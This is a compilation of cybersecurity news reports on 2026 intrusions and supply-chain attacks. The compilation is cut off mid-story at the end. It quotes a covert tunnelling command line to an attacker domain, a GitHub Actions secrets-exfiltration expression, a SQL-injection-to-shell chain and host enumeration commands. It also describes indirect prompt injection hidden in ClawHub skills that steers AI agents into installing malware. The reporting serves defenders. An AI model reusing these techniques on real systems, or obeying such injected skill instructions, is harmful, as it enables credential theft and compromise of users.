An active malware distribution campaign abusing two prominent AI platforms, Hugging Face and ClawHub, to deliver trojans, cryptominers, and infostealers disguised as legitimate AI tools and agent extensions.

The campaign marks a significant evolution in supply chain attacks, shifting from traditional software repositories to trusted AI ecosystems.

Within the OpenClaw ecosystem distributed through ClawHub, Acronis TRU identified 575 malicious skills published across 13 developer accounts.

The campaign appears to be primarily driven by two threat actors: “hightower6eu,” responsible for 334 malicious skills (58%), and “sakaen736jih,” responsible for 199 skills (34.6%), with the remaining 11 accounts contributing smaller volumes.

These trojanized skills masquerade as useful tools such as a YouTube transcript summarizer while secretly instructing users to download password-protected archives or execute encoded commands.

Hugging Face and ClawHub Leveraged

For Windows targets, payloads were detected as trojans packed with VMProtect. For macOS, a base64-encoded command connects to an external IP (91.92.242[.]30) and silently downloads and executes AMOS Stealer, a macOS-focused infostealer commonly sold as malware-as-a-service (MaaS) through Telegram and underground forums.

A second Windows payload used a 30-byte XOR key to decrypt strings at runtime, dynamically resolved NT APIs, and performed in-memory process injection into explorer.exe.

The injected code established AES-encrypted C2 communication over HTTPS to hxxps://velvet-parrot[.]com:443, downloaded a cryptominer disguised as svchost.exe, and maintained persistence via scheduled tasks and Windows Defender exclusion paths.

A critical technique observed across ClawHub campaigns is indirect prompt injection, which embeds hidden, malicious instructions within skill files that AI agents read and execute on behalf of users.

Because OpenClaw agents are designed to act autonomously based on instructions in skill definitions, attackers can effectively turn these agents into unwitting intermediaries, expanding attack impact far beyond the initial victim.

On Hugging Face, which hosts over one million machine learning models, Acronis TRU identified repositories serving as multi-stage infection chain staging points, hosting payloads across Windows, Linux, and Android. Two tracked campaigns illustrate this abuse in practice.

The ITHKRPAW campaign, targeting Vietnamese financial sector organizations in January, used a malicious LNK file to invoke Cloudflare Workers, which served a PowerShell dropper that fetched a payload from a Hugging Face dataset repository while opening a decoy cat image to mask activity.

Researchers assess with moderate confidence that the PowerShell script was LLM-generated, based on embedded Vietnamese-language comments.

The FAKESECURITY campaign used a batch script (CDC1.bat) containing an encoded PowerShell blob that downloaded a heavily obfuscated secondary batch script from a Hugging Face repository.

After stripping the Mark-of-the-Web to bypass Windows SmartScreen, the malware injected shellcode into explorer.exe and dropped a file masquerading as Windows Security.

Organizations and developers should treat AI models, datasets, and agent extensions as untrusted inputs requiring the same validation applied to any third-party code.

Specific steps include auditing installed OpenClaw skills for encoded commands or external download instructions, monitoring for unexpected process injection into explorer.exe, blocking known malicious indicators (91.92.242[.]30, velvet-parrot[.]com), and restricting Windows Defender exclusion path modifications via Group Policy.

Cybercriminals now enter through your suppliers instead of your front door – Free Webinar

The post Hackers Leveraged Hugging Face and ClawHub With 575+ Malicious Skills to Deploy Malware appeared first on Cyber Security News.

A sophisticated adversarial campaign targeting South-East Asian government and military infrastructure, combining rapid exploitation of a critical cPanel authentication bypass with a custom zero-day exploit chain against an Indonesian defense-sector portal and ultimately pivoting to exfiltrate over 4GB of sensitive Chinese railway documents.

The campaign’s initial access vector centered on CVE-2026-41940, a critical CVSS 9.8 authentication bypass in cPanel and WHM affecting all versions after v11.40.

The flaw exploits CRLF injection in the login and session-loading processes, allowing an unauthenticated attacker to manipulate the whostmgrsession cookie and gain full root-level administrative access without valid credentials.

Exploitation was confirmed in the wild before cPanel’s patch was released on April 28, 2026, and CISA subsequently added it to its Known Exploited Vulnerabilities catalog. In this campaign, cPanel exploitation represented only one component of a broader and more alarming operation uncovered from an exposed command-and-control (C2) server.

cPanel Vulnerability Exploited

More significantly, Ctrl-Alt-Intel recovered a custom exploit targeting an Indonesian Defence sector training portal.

The threat actor already possessed valid credentials and bypassed the portal’s CAPTCHA mechanism by reading the expected CAPTCHA value directly from the server-issued session cookie, rendering the challenge completely ineffective without solving it.

Once inside, the actor targeted a document-management function, injecting SQL into the document-name field via a vulnerable save endpoint.

The SQL injection was then escalated to full operating system access by abusing PostgreSQL’s COPY ... TO PROGRAM capability, which allows the database server to spawn arbitrary shell commands.

Command output was captured to /tmp, base64-encoded, and re-ingested into application records using pg_read_file() — a stealthy, file-read-based exfiltration channel entirely native to the database layer.

The exploit script, named exploit_siak_bahasa.py (SHA-256: 974E272A...), contained Vietnamese-language comments, though Ctrl-Alt-Intel explicitly cautions this is insufficient for attribution and may represent deliberate misdirection.

For command and control, the actor deployed an AdaptixC2 payload (ELF binary named 1) configured to beacon to delicate-dew.serveftp[.]com:4455, with server-side telemetry corroborating the C2 address at 95.111.250[.]175.

A PowerShell reverse shell (init.ps1) was also recovered, establishing a TCP connection back to the same IP on port 4444.

To ensure durable, persistent access, the actor combined OpenVPN and Ligolo into a layered pivot stack. An OpenVPN server was deployed on 95.111.250[.]175:1194/UDP as early as April 8, 2026, routing through the 10.8.0.0/24 client subnet.

The Ligolo proxy agent was installed under a hidden directory /usr/local/bin/.netmon/, masqueraded as a systemd service named systemd-update.service, and configured to restart automatically — providing persistent re-entry even after reboots.

Routing through this pivot infrastructure, the actor reached an internal host at 10.16.13.88 and deployed exfil_docs_v2.sh, a custom SFTP-based exfiltration script.

In total, 110 files (~4.37GB) were stolen from the China Railway Society Electrification Committee spanning .pptx, .pdf, .docx, and .xlsx formats dating from 2020 to 2024.

Among the most sensitive materials were 2021 financial workbooks containing full names, PRC national ID numbers, bank account details, and phone numbers.

Ctrl-Alt-Intel stops short of firm attribution, though the victimology South-East Asian military and government targets combined with theft of Chinese state-adjacent transport-sector data points to a deliberate regional intelligence collection effort.

The Shadowserver Foundation confirmed on April 30, 2026, that 44,000 unique IP addresses were observed scanning for victims, launching exploits, or conducting brute-force attacks against their honeypot sensors.

Organizations running cPanel/WHM are urged to patch to the latest version immediately and audit server logs for signs of CRLF-based session manipulation.

Indicators of Compromise (IoCs)

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Breach Government and Military Servers by Exploiting cPanel Vulnerability appeared first on Cyber Security News.

Canonical, the company behind the Ubuntu Linux distribution, is currently experiencing widespread service disruptions across its core web infrastructure following a coordinated Distributed Denial-of-Service (DDoS) attack.

The hacktivist group identifying itself as “The Islamic Cyber Resistance in Iraq – 313 Team” has claimed responsibility for the offensive, marking one of the most significant attacks against open-source infrastructure in recent memory.

Widespread Outages Across Critical Services

According to Canonical’s official status page, more than a dozen services and domains have been reported as Down, spanning developer tools, security APIs, and public-facing portals. The affected components include:

• ubuntu.com and canonical.com
• security.ubuntu.com
• archive.ubuntu.com
• developer.ubuntu.com
• blog.ubuntu.com
• portal.canonical.com
• assets.ubuntu.com
• academy.canonical.com
• jaas.ai and maas.io
• Ubuntu Security API – CVEs
• Ubuntu Security API – Notices

The disruption of Ubuntu Security API – CVEs and Ubuntu Security API – Notices is particularly concerning, as these endpoints are relied upon by system administrators, patch management tools, and security automation pipelines worldwide to fetch vulnerability data and security advisories in real time.

Hacktivist Group Claims Responsibility

Threat intelligence account Vecert Analyzer flagged the incident on X (formerly Twitter), issuing a critical alert describing it as a “massive attack against open-source infrastructure.”

The post confirmed that the DDoS offensive was targeting Ubuntu’s primary servers and had resulted in a total disruption of the platform’s web and technical services.

The 313 Team, which presents itself under an Islamist hacktivist banner, has been known to conduct politically motivated cyberattacks against Western and technology-linked targets.

While DDoS attacks do not involve data exfiltration or system compromise, the sustained takedown of critical open-source services carries significant operational impact for the global developer and security community.

Ubuntu remains one of the world’s most widely deployed Linux distributions, with a massive user base spanning cloud providers, enterprise environments, and individual developers.

The unavailability of archive.ubuntu.com disrupts package installations and system updates, while the outage of security-related APIs could delay automated patching workflows for organizations dependent on Ubuntu’s security feed infrastructure.

As of this writing, Canonical has acknowledged the outages via its status page, though no official statement attributing the cause to the DDoS campaign has been published. Ubuntu’s official X account has also acknowledged the incident.

Security teams relying on Ubuntu’s CVE and advisory APIs are advised to implement fallback data sources, such as the NVD or OSV, until services are fully restored.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Ubuntu Website and Canonical Web Services Hit by DDoS Attack appeared first on Cyber Security News.

A major software supply chain attack has compromised the popular Python package elementary-data, exposing thousands of developers to massive credential theft.

Threat actors successfully pushed a malicious version, 0.23.3, to the Python Package Index (PyPI) and poisoned the matching Docker images on the GitHub Container Registry (GHCR).

With over one million monthly downloads, this widely used dbt data observability tool represents a highly lucrative target for cybercriminals.

As detailed by StepSecurity researchers, the attack did not rely on stolen developer passwords.

Instead, hackers exploited a script-injection vulnerability in the project’s GitHub Actions pipeline.

Information Stealer Payload

A newly created GitHub account posted a malicious script in an open pull request comment.

Because the automated workflow failed to process this comment safely, the system executed the code.

Using the workflow’s built-in access token, the attacker forged a verified release commit and triggered the official publishing process without ever touching the main codebase.

Once installed, the compromised package drops a single malicious file named elementary.pth into the environment.

Since Python automatically runs .pth files whenever the interpreter starts, the malware activates immediately on any machine where the package is installed.

According to threat intelligence reports, the payload is a sophisticated, three-stage information stealer that actively hunts for critical developer secrets and credentials.

It systematically targets and steals:

• Cloud access tokens for AWS, Google Cloud, and Azure.
• SSH private keys and Git credentials.
• Kubernetes service account tokens and Docker configurations.
• Environment (.env) files containing application secrets.
• Multiple cryptocurrency wallets, including Bitcoin and Ethereum.

All stolen data is compressed into an archive and silently sent to a remote, attacker-controlled command-and-control server.

Affected Versions

To check if you are impacted, StepSecurity advises reviewing your installed builds.

The compromised version of the elementary-data PyPI package is 0.23.3. However, users are safe if they use version 0.23.4 or the earlier 0.23.2.

Similarly, the affected Docker image is ghcr.io/elementary-data/elementary:0.23.3, while version 0.23.4 (or 0.23.2) is clean.

Furthermore, if you are using the latest Docker image tag with a digest ending in 634255, your environment is compromised.

StepSecurity warns that you must ensure your latest tag is updated to the newly provided clean build.

Thanks to the quick action of community members Crisperik and H-Max, who spotted the malicious code, the maintainers were alerted within hours.

The Elementary team immediately removed the dangerous 0.23.3 version from PyPI and GHCR, releasing a clean 0.23.4 replacement the same day.

Developers who were exposed to the malicious update must fully rotate all credentials, API keys, and database passwords on the affected machines.

Enable two-factor authentication on all vital infrastructure and pin future package dependencies to specific, verified versions to stop automatic malicious updates.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Popular PyPI Package With 1 Million Monthly Downloads Hacked to Inject Malicious Scripts appeared first on Cyber Security News.

A major investigation has revealed that sophisticated threat actors are exploiting fundamental vulnerabilities in global mobile networks to track users worldwide.

By abusing legacy 3G SS7 and 4G Diameter signaling protocols, hackers are successfully bypassing telecom firewalls to conduct silent, cross-border espionage.

The extensive Citizen Lab research uncovered two distinct surveillance threat actors, identified as STA1 and STA2, operating long-running espionage campaigns.

These groups exploit the inherently trusted nature of telecom interconnect networks to launch their attacks.

By functioning as “Ghost Operators,” they manipulate routing data to mask their origins while pinpointing the exact locations of high-value targets.

Hackers Abuse SS7 and Diameter Protocols

These global attacks are made possible by structural weaknesses in international mobile communications.

While the older SS7 protocol completely lacks basic authentication, the newer 4G Diameter protocol suffers from weak security implementation across the industry.

Attackers heavily abuse “combined attach” procedures, allowing roaming devices to register with 3G and 4G networks simultaneously, enabling seamless protocol pivoting.

The Citizen Lab investigation highlighted two unique approaches to covert mobile surveillance. STA1 focuses entirely on aggressive network routing manipulation by spoofing legitimate operator hostnames and abusing third-party access points.

Meanwhile, STA2 takes a more invasive approach by combining network protocol queries with a silent exploit targeting the device itself.

STA1 Network Spoofer

STA1 primarily conducts its tracking attacks using signaling routing manipulation as its main vector. To execute these operations, this threat actor rapidly switches between legacy SS7 and newer Diameter protocols to find vulnerabilities in telecom firewalls.

Furthermore, STA1 evades detection by spoofing network data, allowing its malicious requests to blend in as legitimate operator traffic.

STA2 SIM Exploiter

In contrast, STA2 relies heavily on a zero-click binary SMS payload as its primary attack vector. This actor’s strategy combines SS7 network probing and malicious SIM Toolkit commands to extract location data directly from the target’s device.

To ensure the victim remains unaware, STA2’s evasion tactic exploits silent, low-priority push messages that do not trigger phone alerts.

The ongoing surveillance crisis highlighted by Citizen Lab reveals a major blind spot in the global telecommunications industry.

Mobile operators currently rely on third-party interconnect routing hubs with dangerously weak traffic screening.

Until the industry abandons legacy peer-to-peer trust models and enforces strict cryptographic authentication, mobile users worldwide will remain vulnerable to unseen tracking.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Abuse SS7 and Diameter Protocols to Track Mobile Users Worldwide appeared first on Cyber Security News.

A significant supply chain attack targeting the official checkmarx/kics Docker Hub repository, where threat actors pushed trojanized images capable of harvesting and exfiltrating sensitive developer credentials and infrastructure secrets.

Docker’s internal monitoring flagged suspicious activity around KICS image tags on April 22, 2026, and promptly alerted Socket researchers.

The investigation revealed that attackers had overwritten existing tags, including v2.1.20 and alpine while also introducing a new v2.1.21 tag that has no corresponding legitimate upstream release.

The affected tags ultimately included v2.1.20-debian, v2.1.20, debian, alpine, and latest, all of which have since been restored to their prior legitimate releases.

KICS, short for Keeping Infrastructure as Code Secure, is an open-source tool widely used by DevOps and security teams to scan Terraform, CloudFormation, and Kubernetes configurations for security misconfigurations. Its broad adoption across CI/CD pipelines made it an especially high-value target for supply chain attackers.

Trojanized Binary and Credential Exfiltration

Analysis of the poisoned KICS images revealed that the bundled ELF binary written in Golang had been modified to include unauthorized telemetry and data exfiltration capabilities entirely absent from the legitimate version.

The malware was designed to generate uncensored IaC scan reports, encrypt the results, and silently transmit them to an attacker-controlled external endpoint at https://audit.checkmarx[.]cx/v1/telemetry.

Organizations that used the affected images to scan infrastructure-as-code files should treat any exposed secrets, cloud credentials, or API keys as potentially compromised.

The malicious binary shared the same Command and Control (C2) server address as a separately discovered JavaScript payload called mcpAddon.js, indicating a coordinated, multi-component attack infrastructure.

VS Code Extensions Also Weaponized

As Socket researchers expanded their investigation, the scope broadened well beyond Docker Hub. Trojanized versions of Checkmarx’s VS Code and Open VSX extensions were also identified specifically, cx-dev-assist versions 1.17.0 and 1.19.0, and ast-results versions 2.63.0 and 2.66.0.

These extensions, upon activation, silently downloaded a second-stage payload (mcpAddon.js) from a hardcoded GitHub URL pointing to an orphaned backdated commit (68ed490b) in the official Checkmarx repository, then executed it using the Bun runtime without user consent or integrity verification.

The mcpAddon.js file a heavily obfuscated, ~10MB JavaScript bundle functioned as a full-featured credential stealer.

It harvested GitHub authentication tokens, AWS credentials, Azure and Google Cloud tokens, npm configuration files, SSH keys, and environment variables, compressing and encrypting the exfiltrated data before sending it to the attacker’s endpoint.

The malware’s reach extended beyond credential theft. Using stolen GitHub tokens, the malware injected malicious GitHub Actions workflows (.github/workflows/format-check.yml) into repositories the victim had write access to.

The workflow exploited ${{ toJSON(secrets) }} to serialize and exfiltrate the entire secrets context of each targeted repository as a downloadable artifact. Stolen npm tokens were further abused to identify and republish writable packages, enabling downstream supply-chain propagation across the npm ecosystem.

The threat actor group TeamPCP appears to be claiming credit for the attack. Their account on X posted taunting messages after the story broke, stating “Thank you OSS distribution for another very successful day at PCP inc.”.

This is consistent with TeamPCP’s prior March 2026 campaign, in which the group compromised Checkmarx GitHub Actions and OpenVSX plugins in a broader supply chain attack that also targeted Trivy and LiteLLM.mrcloudbook+2

Mitigations

Security teams should take the following actions immediately:

• Remove all affected KICS Docker images, VS Code extensions, and GitHub Actions from developer systems and build pipelines
• Rotate GitHub tokens, npm tokens, cloud credentials (AWS, Azure, GCP), SSH keys, and all CI/CD secrets exposed to affected environments
• Audit GitHub repositories for unauthorized workflow files, unexpected branch creation, suspicious artifact downloads, and public repositories named with the pattern <word>-<word>-<3 digits> with the description “Checkmarx Configuration Storage”
• Hunt for outbound connections to 94[.]154[.]172[.]43 or audit.checkmarx[.]cx, unexpected Bun runtime execution, and unauthorized access to .npmrc, .env, or cloud credential stores
• Pin Docker image references to verified SHA256 digests rather than mutable tags

Key Indicators of Compromise

Socket has disclosed its findings to the Checkmarx security team and continues to publish updated technical analysis as the investigation develops. The Docker repository has been archived, and all affected tags have been restored to verified legitimate releases.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Checkmarx KICS Official Docker Repo Compromised to Inject Malicious Code appeared first on Cyber Security News.

A real-world intrusion campaign leveraging publicly available Nightmare-Eclipse privilege escalation tooling, BlueHammer, RedSun, and UnDefend, following what appears to be unauthorized access through a compromised FortiGate SSL VPN.

The incident marks the first confirmed in-the-wild deployment of these tools against a live enterprise environment, raising urgent alarms for security teams globally.

The tools at the center of this incident were developed by a security researcher known as Chaotic Eclipse, also referred to as Nightmare-Eclipse, a pseudonymous figure who grew frustrated with Microsoft’s vulnerability disclosure process and publicly released a series of local privilege escalation (LPE) exploits in retaliation.

The trio of tools BlueHammer, RedSun, and UnDefend exploits logic flaws in Windows Defender’s privileged operations to escalate an attacker from an unprivileged user account to SYSTEM-level access, or to disrupt Defender’s security functions entirely without requiring administrative rights.

Microsoft addressed BlueHammer in its April 2026 Patch Tuesday update, tracking it as CVE-2026-33825. However, as of publication, RedSun and UnDefend remain unpatched zero-days actively usable against fully updated Windows systems.

Nightmare-Eclipse Tools Using FortiGate SSL VPN Access

Huntress first detected suspected in-the-wild use of BlueHammer on April 10, 2026, when a binary named FunnyApp.exe — a build pulled directly from the public BlueHammer GitHub repository was executed from a victim user’s Pictures folder and subsequently quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.

Activity escalated on April 16, with investigators observing RedSun.exe an execution from the user’s Downloads directory, alongside multiple executions of undef.exe the UnDefend binary from short two-letter subfolders such as \ks\ and \kk\.

In a telling sign of operator inexperience, the threat actor invoked UnDefend with an -agressive flag (misspelled) and a -h help flag that does nothing in the tool, demonstrating they had not fully read or understood the tooling.

Critically, none of the privilege escalation attempts succeeded: BlueHammer did not extract SAM credentials, RedSun did not overwrite TieringEngineService.exe in System32, and UnDefend was terminated by Huntress’ SOC during active remediation.

Customer-provided VPN logs revealed a critical piece of the puzzle. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP 78.29.48[.]29, geolocated to Russia.

Subsequent unauthorized sessions tied to the same account were observed from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland) a multi-geography access pattern consistent with credential abuse and possible credential resale or sharing.

The most operationally dangerous component Huntress identified was a Go-compiled Windows binary dubbed BeigeBurrow, executing as agent.exe -server staybud.dpdns[.]org:443 -hide.

The tool uses HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port rarely blocked by enterprise firewalls.

Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound and is the only component in the observed toolkit that achieved its intended purpose. Huntress noted it has observed BeigeBurrow in at least one other unrelated intrusion, though attribution remains unclear.

Beyond tool execution, Huntress confirmed the presence of a live, hands-on-keyboard threat actor through post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group.

Notably, whoami /priv was spawned directly from an M365Copilot.exe process, an anomaly that investigators could not fully explain but noted occurred after the initial compromise and following BlueHammer’s first execution attempt.

Indicators of Compromise (IoCs)

Mitigation Guidance

Organizations should treat any confirmed execution of these binaries as high-priority incident activity. Huntress recommends the following immediate actions:

• Patch immediately: Apply Microsoft’s April 2026 Patch Tuesday update to remediate CVE-2026-33825 (BlueHammer).
• Hunt for staging artifacts: Investigate user-writable paths such as Pictures\ and short subfolders under Downloads\ for binaries like FunnyApp.exe, RedSun.exe, undef.exe, and z.exe.
• Review VPN authentication logs: Flag any account authenticating from multiple countries within a short timeframe.
• Block and monitor tunneling behavior: Investigate any execution of agent.exe with -server and -hide flags, and block the domain staybud.dpdns[.]org.
• Detect post-exploitation enumeration: Alert on whoami /priv, cmdkey /list, and net group spawned from unusual parent processes.

A YARA detection rule for BeigeBurrow has been published publicly to aid community-wide detection efforts.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Use Nightmare-Eclipse Tools After Compromising FortiGate SSL VPN Access appeared first on Cyber Security News.

A massive malware campaign known as “StealTok” involves at least 12 interrelated browser extensions. These extensions masquerade as TikTok video downloaders but secretly track user activity and harvest sensitive data.

The campaign uncovered by LayerX security has affected over 130,000 users worldwide, with approximately 12,500 installations still active across the Google Chrome and Microsoft Edge marketplaces.

The attackers use a highly organized approach, releasing multiple clones or slightly rebranded versions of the same core extension.

This creates a resilient operation: when one extension is identified and removed, threat actors upload a new clone to replace it.

To gain user trust, the malicious extensions initially function perfectly as advertised, allowing users to download TikTok videos without watermarks.

Many of these tools even earned a “Featured” badge in official extension stores, significantly reducing user suspicion and boosting download numbers.

What makes this campaign particularly dangerous is its use of delayed capability injection.

For the first 6 to 12 months, the extensions behave legitimately, building a solid reputation and passing initial security reviews.

Once enough time has passed, the extensions connect to external command-and-control servers to download dynamic remote configurations.

This hidden mechanism allows the attackers to fundamentally alter the extension’s behavior, turning a harmless video downloader into a powerful spyware tool without alerting the user or the marketplace.

After the malicious features are activated, the extensions begin quietly gathering extensive telemetry on the user.

They monitor usage patterns, track downloaded content, and collect high-entropy data, such as time zone, language settings, and even device battery status.

By combining these specific data points, the attackers can create a highly accurate “fingerprint” of the user’s device, enabling them to track the user across different web sessions and services.

To hide this data theft, the extensions send the information to deceptive domains with misspelled names, like “trafficreqort.com,” to avoid casual detection.

This campaign highlights a critical weakness in current browser security: relying solely on installation-time validation is no longer enough.

Because these extensions use remote configurations to evolve, the real risk happens long after the initial download.

Security experts recommend that organizations adopt continuous, behavior-based monitoring to detect suspicious network activity, hidden data collection, and unexpected permission usage in real-time.

Active and Removed Threats

LayerX security researchers identified several specific extensions involved in the StealTok campaign.

On Google Chrome, active threats include “TikTok Downloader – Save Videos, No Watermark” with 3,000 installs, “TikTok Video Downloader – Bulk Save” with 1,000 installs, and “Tiktok Downloader” with 353 installs.

On Microsoft Edge, active malicious extensions include “Mass Tiktok Video Downloader” with 77 installs and another version named “TikTok Downloader – Save Videos, No Watermark” with 47 installs.

Several highly popular versions of this malware have already been removed from Google Chrome, including “TikTok Video Keeper,” which had reached 60,000 installs, and “Video Downloader for Tiktok,” which had 20,000 installs.

If you have any of these extensions installed, security experts advise removing them immediately and changing passwords for sensitive accounts.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post 12 Browser Extensions Mimic as TikTok Video Downloaders Compromised 130k Users appeared first on Cyber Security News.

According to a recent April 2026 report by security researcher Himaja Motheram at Censys, just under 6 million internet-facing hosts are still running the File Transfer Protocol (FTP).

While this marks a significant 40% decline from the 10.1 million servers observed in 2024, the presence of this decades-old protocol continues to pose an exposure risk due to widespread insecure default configurations.

The Censys report highlights that the dominant story of FTP exposure in 2026 is not purpose-built file transfer infrastructure, but rather an accumulation of platform defaults on shared hosting networks and broadband providers.

The State of Encryption and Regional Risks

When it comes to securing these servers, the data reveals a mixed landscape. Censys found that roughly 58.9% of observed FTP hosts completed a Transport Layer Security (TLS) handshake, meaning they support encrypted connections.

However, this leaves approximately 2.45 million hosts without observed evidence of encryption, potentially allowing them to transmit files and credentials in cleartext.

The lack of encryption adoption varies significantly by region. According to Censys data, mainland China and South Korea have the lowest TLS adoption rates among the top 10 hosting countries, at 17.9% and 14.5%, respectively.

Meanwhile, Japan accounts for 71% of all FTP servers globally that still rely on outdated, deprecated legacy encryption protocols such as TLS 1.0 and 1.1.

The security posture of these 6 million servers is heavily influenced by the default settings of the software daemons running them.

Key technical observations from the Censys report include:

• Pure-FTPd Dominance: Operating on roughly 1.99 million services, this is the most common FTP daemon, largely driven by its inclusion as a default in cPanel hosting environments.
  
• The IIS FTP Configuration Trap: Over 150,000 Microsoft IIS FTP services return a “534” error response, indicating TLS was never configured.
  
  While IIS defaults to a policy that appears to require encryption, it does not bind a security certificate upon a fresh installation.
  
  Consequently, the server accepts cleartext credentials, even though the configuration appears to enforce TLS.
  
• Hidden Nonstandard Ports: Relying only on port 21 scans miss a significant portion of the attack surface.
  
  Tens of thousands of FTP services run on alternate ports, such as 10397 or 2121, often tied to specific telecom operations or network-attached storage devices.

Mitigation and Hardening Strategies

For enterprise defenders and infrastructure administrators, Censys strongly recommends evaluating whether FTP is truly necessary before attempting to harden it.

Organizations should consider the following mitigation strategies:

• Migrate to Secure Alternatives: Whenever possible, replace FTP with SSH File Transfer Protocol (SFTP), which encrypts credentials and data by default over port 22.
  
• Enforce Explicit TLS: If legacy FTP infrastructure must remain online, administrators should configure their daemons to enforce Explicit TLS (FTPS) and refuse cleartext connections.
  
• Fix IIS Certificate Bindings: Windows Server administrators using IIS FTP must ensure that a valid certificate is bound to the FTP site and verify that the SSL policy actively enforces encryption.

Ultimately, while the internet’s reliance on FTP is slowly shrinking, millions of instances continue to run quietly in the background.

As Censys warns, the primary risk is not advanced zero-day attacks, but the simple failure to update default configurations that leave systems unnecessarily exposed.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Nearly 6 Million Internet-Facing FTP Servers Still Exposed in 2026, Censys Warns appeared first on Cyber Security News.

The U.S. Justice Department and the FBI have successfully dismantled a massive cyberespionage network in a court-authorized takedown dubbed “Operation Masquerade.”

Announced on April 7, 2026, the technical operation neutralized thousands of compromised small office/home office (SOHO) routers that were hijacked by Russian military intelligence to spy on global targets.

The disruption targeted a hacking unit within Russia’s Main Intelligence Directorate (GRU), widely tracked by cybersecurity researchers as APT28, Fancy Bear, Forest Blizzard, and Sednit.

Since at least 2024, these state-sponsored hackers have actively exploited known security vulnerabilities to steal credentials for thousands of TP-Link routers worldwide.

Russian Router Hijacking Operation

Once the GRU actors gained unauthorized access to a router, they manipulated its Domain Name System (DNS) settings. This effectively redirected the victim’s internet traffic to malicious, attacker-controlled DNS resolvers.

While the initial router compromises were indiscriminate, the hackers used an automated filtering system to identify high-value targets in the military, government, and critical infrastructure sectors.

For these selected targets, the malicious DNS resolvers served fraudulent records that mimicked legitimate online services, such as Microsoft Outlook Web Access.

This allowed the GRU to execute Actor-in-the-Middle (AitM) attacks against encrypted network traffic.

By routing traffic through their servers, the attackers successfully harvested unencrypted passwords, authentication tokens, emails, and other sensitive data from devices connected to the compromised networks.

To stop the espionage campaign, the FBI developed and deployed a series of remote commands to the compromised routers across 23 states.

These commands gathered vital evidence, purged the malicious GRU DNS resolvers, and restored legitimate ISP default settings.

The commands also locked out the attackers by patching the original means of unauthorized access.

The government extensively tested these actions alongside MIT Lincoln Laboratory to ensure they did not break normal router functionality or access private user data.

The disruption effort was a collaborative success involving the FBI’s Boston and Philadelphia Field Offices, with critical threat intelligence provided by Microsoft and Black Lotus Labs at Lumen.

Recommended Remediation Steps

While the FBI has secured the compromised devices, the agency urges all SOHO router owners to take proactive steps to defend their networks:

• Replace any End-of-Life (EoL) or unsupported routers immediately.
• Upgrade the hardware to the latest available firmware from the manufacturer.
• Verify the authenticity of the DNS resolvers listed in your router’s configuration settings.
• Review and update firewall rules to prevent the public exposure of remote management services.

The FBI is currently working directly with Internet Service Providers to notify impacted users.

If you believe your router was compromised, you are encouraged to check the official TP-Link download center for proper configuration guidelines and file a report with the FBI’s Internet Crime Complaint Center (IC3).

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post FBI Disrupts Russian Router Hijacking Operation Compromised Thousands of Users appeared first on Cyber Security News.

Cybercriminals are launching a sophisticated new wave of attacks using fake Microsoft Teams domains. According to recent threat intelligence shared by SEAL Org, hackers are actively tricking corporate users into downloading malicious payloads by mimicking the widely used communication platform.

As Microsoft Teams remains an essential tool for remote and hybrid work environments, threat actors are aggressively exploiting employees’ trust in the software.

Fake “Microsoft Teams” Domains

The attack sequence typically begins with a highly convincing phishing email or a deceptive direct message. These messages urge the victim to join an urgent corporate meeting or review a critical HR document.

The provided link leads to a spoofed website. These fraudulent URLs look incredibly legitimate at first glance, often blending words like “teams,” “update,” or “meeting” to avoid raising suspicion.

When a user clicks the fake meeting link, they are redirected to a landing page that perfectly copies the official Microsoft Teams interface.

The page then displays a fake error message. It informs the victim that they must install a critical software update or download a specific plugin to join the scheduled call.

If the victim clicks the download button, a malicious file is downloaded to their machine. Instead of a legitimate software patch, this file acts as a dropper for a severe malware payload.

Once the downloaded file is executed, the payload springs into action. These attacks frequently deploy advanced info-stealing malware or Remote Access Trojans (RATs).

These malicious tools operate silently in the background, making them difficult for standard antivirus programs to detect.

The malware immediately begins scraping the infected computer for sensitive data. It targets stored login credentials, browser session cookies, and proprietary corporate documents.

In more severe cases, the initial payload creates a backdoor for other cybercriminals, as highlighted in a post on X by Security Alliance.

This unauthorized access can serve as a stepping stone for ransomware gangs to infiltrate the broader corporate network and encrypt critical infrastructure.

Organizations must adopt a proactive security posture to defend against these spoofed domain attacks.

Security teams can implement several key strategies to mitigate the risk:

• Block known malicious domains at the network level and monitor DNS logs for suspicious URL patterns.
• Train employees to carefully inspect website addresses before downloading any files or entering login credentials.
• Enforce multi-factor authentication across all corporate accounts to limit the usefulness of stolen passwords.
• Deploy robust endpoint detection and response software to identify and isolate malicious behaviors in real time.

Legitimate Microsoft Teams updates are handled automatically within the application itself or managed directly by internal IT departments. Employees should be reminded never to download software updates from unverified external links.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Using Fake “Microsoft Teams” Domains to Attack Users Via Malicious Payload appeared first on Cyber Security News.

Meta has officially alerted approximately 200 WhatsApp users, primarily located in Italy, that their devices were compromised by a weaponized, fraudulent version of the messaging application.

This malicious software was distributed through social engineering tactics rather than official app stores, tricking targets into installing a spyware-laden clone.

The fraudulent application was designed to mimic the exact look and feel of the legitimate WhatsApp client to deceive unsuspecting victims. It was pushed to targeted individuals as a necessary update or an exclusive alternative variant of the popular messaging platform.

